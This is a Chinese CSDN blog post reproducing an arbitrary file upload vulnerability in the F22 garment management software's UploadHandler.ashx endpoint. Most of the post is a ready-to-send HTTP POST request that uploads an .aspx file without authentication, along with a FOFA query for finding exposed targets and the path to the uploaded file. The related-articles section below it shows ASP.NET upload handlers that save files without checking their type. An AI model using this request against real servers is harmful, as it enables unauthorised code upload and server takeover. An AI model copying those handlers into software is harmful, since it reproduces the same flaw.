F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞

最新推荐文章于 2024-06-18 06:23:56 发布
最新推荐文章于 2024-06-18 06:23:56 发布
阅读量297 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/135822676
版权

漏洞描述

image.png

影响范围

F22服装管理软件系统

复现

fofa语法:body=“F22WEB登陆”

POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host:IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
Content-Length: 409

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

image.png
返回带时间戳的文件说明上传成功
文件访问路径http://ip/upload/udplog/20231130123414718.aspx
image.png

qq_36334672
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞
失心少年
12-08 740
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!广州锦铭泰软件科技有限公司开发的F22服装管理软件系统/CuteSoft_Client/UploadHandler.ashx接口存在任意文件上传漏洞,由于系统对用户上传的文件类型未作任何过滤和限制,未授权的攻击者可以通过此接口上传恶意后门文件获取服务器信息或权限。
利用ashx文件实现文件的上传功能
02-27 652
原来以为文件上传是一个比较简单的功能,结果搞了一个晚上才搞定~这里主要介绍两种方法实现。 方法一:Form表单提交 html代码: <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>上传文件</title> <scrip...
Uploadify jquery+flash+UploadHandler.ashx .(用)
GoodShot的专栏
11-09 4944
官方网:http://www.uploadify.com/ 只有PHP版本 对于我们.net的来说是一个遗憾!现在奉献一个c#版本,希望对大家有用。 看代码其实很简单,在做这个之前遇到许多问题,特别是在IHttpHandler 里面,只有经历过了才会体会到,还是给解决了! 直接运行html出现下面错误  要在vs运行下才没有下面错误      下面通过三个步骤,给一个完整的上传案例
Uploadify jquery+falsh+UploadHandler.ashx
weixin_34319640的博客
11-06 106
官方网:http://www.uploadify.com/只有PHP版本 对于我们.net的来说是一个遗憾!现在奉献一个c#版本,希望对大家有用。 看代码其实很简单,在做这个之前遇到许多问题,特别是在IHttpHandler 里面,只有经历过了才会体会到,还是给解决了! 直接运行html出现下面错误 要在vs运行下才没有下面错误 ...
UploadHandler
04-26
UploadHandler
asp.net利用ashx文件实现文件的上传功能
10-15
在`UploadHandler.ashx`中,处理方式与第一种方法基本相同,只是现在请求是非同步的,因此可以在不刷新页面的情况下完成文件上传。 ### 知识点总结: 1. **ASP.NET HTTP Handler (ASHX)**:ASHX文件是处理HTTP请求...
【ASP.NET编程知识】asp.net利用ashx文件实现文件的上传功能.docx
05-18
<form action="UploadHandler.ashx" method="post" enctype="multipart/form-data"> 上传" /> ``` UploadHandler.ashx 代码: ```csharp using System; using System.Collections.Generic; using System.Linq; ...
jQuery插件ajaxfileupload.js实现上传文件
10-22
`AjaxUpload`对象实例化后,配置上传的URL(默认为`/Common/UploadHandler.ashx?fileType=file`)和其他参数,如文件类型检查(在`onSubmit`回调中实现)。 ```javascript function g_AjxUploadFile(btn, doc, ...
批量上传文件(asp.net C#,Jquery,uploadify)
05-21
源文件是从国外的一个网站上下载的。使用Jquery的上传插件Uploadify,提供upload.ashx的C#源码和VB源码,方便直接使用,因为不会VB,所以只使用C#做了上传的示例。在web.config中配置上传的文件夹路径! 示例的主要功能是创建一个新的文件夹并将文件上传到新的文件夹中,如果不创建文件夹,则在文件的名称前面加上时间标识。
jQuery不使用插件及swf实现无刷新文件上传
12-12
form id=”myForm” method=”post” action=”/asyncFileUpload/UploadHandler.ashx”  enctype=”multipart/form-data” target=”asyncTarget”>  文件:  <input type=”file” name=”myFile” />...
ashx 获取上传的文件_asp.net利用ashx文件实现文件的上传功能
weixin_39965490的博客
12-19 192
原来以为文件上传是一个比较简单的功能,结果搞了一个晚上才搞定~这里主要介绍两种方法实现。方法一:Form表单提交html代码:上传文件UploadHandler.ashx代码:using System;using System.Collections.Generic;using System.Linq;using System.Web;namespace WebApplication1{/// /...
Uploadify jquery+flash+UploadHandler.ashx
莱茵金属
06-20 1142
官方网:http://www.uploadify.com/ 只有PHP版本 对于我们.net的来说是一个遗憾!现在奉献一个c#版本,希望对大家有用。 看代码其实很简单,在做这个之前遇到许多问题,特别是在IHttpHandler 里面,只有经历过了才会体会到,还是给解决了! 直接运行html出现下面错误  要在vs运行下才没有下面错误         ?
网络安全(补充)
m0_62207482的博客
06-11 1203
同步包风暴(SYN Flood)攻击者假造源网址发送多个同步数据包(SYN Packet)给服务器,服务器因无法收到确认数据包(ACK Packet),使TCP/IP协议三次握手无法顺利完成,因而无法建立连接。其原理是发送大量半连接状态的服务请求,使服务主机无法处理正常的连接请求,因而影响正常运作 泪滴攻击暴露出IP数据包分解与重组的弱点,当IP数据包在网络中传输时,会被分解成许多不同的包传送,并借由偏移量字段作为重组的依据。泪滴攻击通过加入过多或不必要的偏移量字段,使计算机系统重组错乱,产生不可预期的后
网络安全攻防基础入门笔记--操作系统&名词解释&文件下载&反弹shell&防火墙绕过
谜语人的博客
06-15 1066
全程Proof of Concept,中文"概念验证",常指一段漏洞证明的代码。
网络安全复习笔记
最新发布
annesede的博客
06-18 428
复习自用,仅供参考~
asp ajax文件上传
05-26
ASP AJAX 文件上传可以使用以下步骤: 1. 在 ASP.NET Web 应用程序中添加 Microsoft Ajax Library。 2. 在页面上添加一个 FileUpload 控件和一个 ASP.NET Button 控件。 3. 在 Button 的 Click 事件中,编写 ASP.NET 代码以处理文件上传。 4. 使用 Ajax 异步 Post 方式将文件上传到服务器。 下面是一个简单的示例代码: HTML 页面: ```html <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ASP AJAX 文件上传示例</title> <script src="/Scripts/MicrosoftAjax.js" type="text/javascript"></script> <script src="/Scripts/MicrosoftAjaxWebForms.js" type="text/javascript"></script> <script src="/Scripts/jquery-1.12.4.min.js" type="text/javascript"></script> <script type="text/javascript"> function uploadFile() { var file = $("#fileUpload").get(0).files[0]; var fd = new FormData(); fd.append("file", file); $.ajax({ url: "UploadHandler.ashx", type: "POST", data: fd, processData: false, contentType: false, success: function (response) { alert(response); }, error: function (xhr, status, error) { alert(error); } }); } </script> </head> <body> <form id="form1" runat="server"> <div> <input type="file" id="fileUpload" /> <br /> <asp:Button ID="btnUpload" runat="server" Text="上传" OnClientClick="uploadFile(); return false;" /> </div> </form> </body> </html> ``` ASP.NET 代码: ```csharp using System; using System.IO; using System.Web; public partial class UploadHandler : IHttpHandler { public void ProcessRequest(HttpContext context) { HttpPostedFile file = context.Request.Files["file"]; string fileName = context.Server.MapPath("~/Uploads/" + Path.GetFileName(file.FileName)); file.SaveAs(fileName); context.Response.Write("上传成功!"); } public bool IsReusable { get { return false; } } } ``` 在这个示例中,我们使用了 jQuery 库来简化 Ajax 调用。在 uploadFile 函数中,我们获取文件上传控件的值,并将文件数据添加到 FormData 对象中。然后使用 Ajax 异步 Post 方式将文件上传到服务器的 UploadHandler.ashx 处理程序。在处理程序中,我们从请求中获取文件并将其保存到服务器的 Uploads 文件夹中。最后,我们向客户端发送一个响应,表示文件上传成功。 注意:这个示例只是演示了如何使用 ASP.NET 和 Ajax 实现文件上传,实际应用中需要进行更多的安全性检查和错误处理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值